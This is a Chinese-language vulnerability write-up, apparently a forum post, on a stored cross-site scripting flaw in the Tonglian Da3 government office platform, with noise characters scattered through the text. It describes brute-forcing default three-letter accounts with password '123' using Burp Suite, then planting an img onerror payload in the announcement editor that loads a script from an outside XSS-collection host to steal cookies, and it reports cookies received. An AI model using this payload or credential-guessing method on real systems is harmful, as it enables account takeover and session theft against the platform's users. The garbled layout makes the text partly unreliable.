# m8 h1 t8 D7 L4 g+ c( z' F
5 J& V# F _* A+ Q3 g 同联Da3协同办公平台后台通用储存型xss漏洞$ }' g/ O; |1 g2 @
s, i8 B) l* N' t5 k1 M5 Z
4 H. I% R! F- P) a! r; k8 _% ? 平台简介:
* I u0 N; P% I& o: ]: a5 b
5 c- `3 l9 s- j
8 }8 C7 f* P/ W3 r3 U. X5 E" Q6 ^
( g3 C7 S& c- W! t' |
u+ J3 ^4 ]8 G) w0 ]5 L 8 T% Q0 O t2 d7 }+ Z! \
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
# P* f5 ?; _, y3 P# }同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
; k1 S# |8 m N7 l+ H同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! U# j* L* [: ^6 R7 ~
: Q/ k1 Z+ X5 i- w# l
. L9 G3 ?1 ?* a9 i8 @2 \
+ I" @! \; p+ q% c# f {
7 X( M [" k' K, ]3 W( {
. ~7 c1 e- Z4 T Q7 |/ v7 G: a0 d' t
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
: S1 h/ D6 C( K! L( {
5 Y; \/ K4 q" ^+ l
6 K2 m- L( Q# }6 E$ @
# S. [' c, f% t3 y( d5 B. j1 l" U
8 F% m2 `( y% b$ z: Y8 G, M
; g9 T$ _( U7 G& ]( B+ e8 p1 A: N http://1.1.1.1:7197/cap-aco/#(案例2-)" j' R& j! e9 g' a" e
2 W {) A1 P4 X p7 B+ d ( f7 U/ R1 z8 e! Y W/ }% I! k1 B
http://www.XXOO.com (案例1-官网网站)- e: x! f6 d# N; g& L
p! |. _, n% F0 }- w$ J4 z
1 b9 s, [* x9 U 漏洞详情:$ t( a& E v/ K- G% h' }# ^
) p+ Z9 ]+ X- g9 H
0 ~& H7 e$ l: ^# B5 C' u* m
案例一、! j5 D( S+ M& l0 Q" L
' r4 }# n- { O* g' v6 L
5 l$ t' N X }3 A. z& o6 b, \8 e0 e 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
7 @" }& d6 W7 H, I. f0 `) ]
; i) |, L- B# i2 K: s8 ~* x 9 a9 v) W3 W9 i* T8 y9 d
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
o2 E. Z1 G% E6 a% M
2 E: W& }$ W. q0 v1 {0 m & _- Z1 I5 E" ]1 `) a
0 l4 q- f2 T. s [! i3 N
! R& k& n y' M
' x0 u0 Y4 l$ q7 F 
0 a4 h5 m' d3 ~' X
; S; g6 V( w/ }7 b1 |& o) `( o
' n% g* X% ~: J; x; z% ]
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
6 ^9 v$ R1 V5 U2 d. q
" m; l6 w9 F$ ]1 J
3 m# z6 L- n6 N. M. ^
0 `4 B% a0 L6 S- j- u6 g+ V
: t. }) ?5 w: b, e4 F1 a- x ) F: D H0 t3 E( E( j' [
* H$ K' y* U, Y: R( c) B
# D, E5 W+ a6 x. j* b2 R7 a* @ ( E0 S& |# K4 ~4 U' c& P/ Y& ~% Y
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
8 d, T, d. {2 I h, F
% W; ]0 _* q; w
& k* w" {- K8 y5 i
. ^. H- S7 O8 {+ G
" h, b* e3 p. Q: l' v* g" i; h 4 Q4 o/ G; K* [$ D. V
<img src=x
5 |3 j. \' A1 Xonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: / m% H1 z! ^: G' M$ V
# }, d! E, M5 }0 L+ l* y9 N$ z
) b% W* F/ |2 R; x 
5 s- S1 l9 f; f1 D: h
; n3 W& ?: y4 f3 i+ x3 S, F O
: J- l6 o& [8 ~- ^ 然后发送,接收cookie如图:
5 a6 P# F0 w3 q( D# P
2 L1 k' f; v9 }* h* {% ?1 e
4 {* Y: Q2 X: r8 {
% A3 t Y" n3 v% k
2 u" g+ |$ V) W, }/ J4 V4 t
* F& V& W& p* R' W8 x ( J5 h5 K# s% p5 f4 \& L0 O" d
5 L/ x# g( t9 } 5 {$ V, T; R+ l/ T5 V
3 N* ]; Z5 ]! Y- U* j
) P: s. r+ f( e# w' i: H# \ 2 V) A5 [8 @4 k- K2 t+ h
* t: G: C8 p$ Z) [4 b3 V7 n
- }- I5 t# U- r6 W; b9 A3 X+ V0 |
, e' J/ d# C7 c: Q8 d, d
/ H- m* ~; V% p+ z. h# R0 y" f+ V
4 z: D: }0 M6 I: a
4 g. C6 L" G* x# ?* [# Q 
: l6 M7 R4 a% O; w; q: l
" S, {+ i7 N; z3 [+ L- _
. ^0 g. d3 E5 y 0 X% \' F0 l/ e) B' @ |& Q
: r4 W3 x* i% D( x $ i: u. Z) d7 _- C, n0 e0 [
案例2、
3 I+ a. E- \7 R* Y) p5 B7 b C
, L) L9 u0 j8 F1 h f; _+ {
+ E G6 S, K; K! R
前面步骤都一样,下面看效果图: / B1 S! ?; _; I$ r
4 |0 s+ j, u- G* z& V. i$ S. X 0 R+ s6 ~+ c( G
) {% B+ L! t/ U+ @
' J& w T) K5 @& t) b2 M4 N
: H. F% `$ |5 G0 _5 N, d 
1 V# { t$ v- r: O0 _; f
2 Q/ w: B, V* r6 |7 {* b5 F- q0 A
8 Z& b! L3 U; I$ }" q/ P
( m" h3 b- f: p% b3 _1 I2 J
5 h; I4 ?" ]3 z2 ?' A' x
5 f% k; t3 `) V9 U& u
1 z6 p# S0 A! ~+ j$ f; M
6 Y% r* f/ O+ h* ]5 ?. O
7 N: z$ _4 i5 g7 k; J
! [3 o* {0 y( e; k* L: S
7 y" i" M) h' j, W& m
# K3 F. H& a. X) @ 1 F6 T: ]+ M$ c& f0 {
# }% ]4 E5 ]# E( E
) K/ ~+ D1 Z5 x" c5 a
: f8 Q. d9 K! _$ L8 x. Q& s
# ~# I3 S* c, T, l. {* w$ x; I# K8 ?( c . z- X8 H: l6 B' c9 I( e
' e! q* }6 S X Z; @1 o) G8 E5 _
( i, p6 f: S, l& F* O0 Y6 V" y
4 z6 g) P+ ~8 o: e, H0 r- M, P
1 n1 \; h+ E% ]. m
; U V; r; p# e1 d( A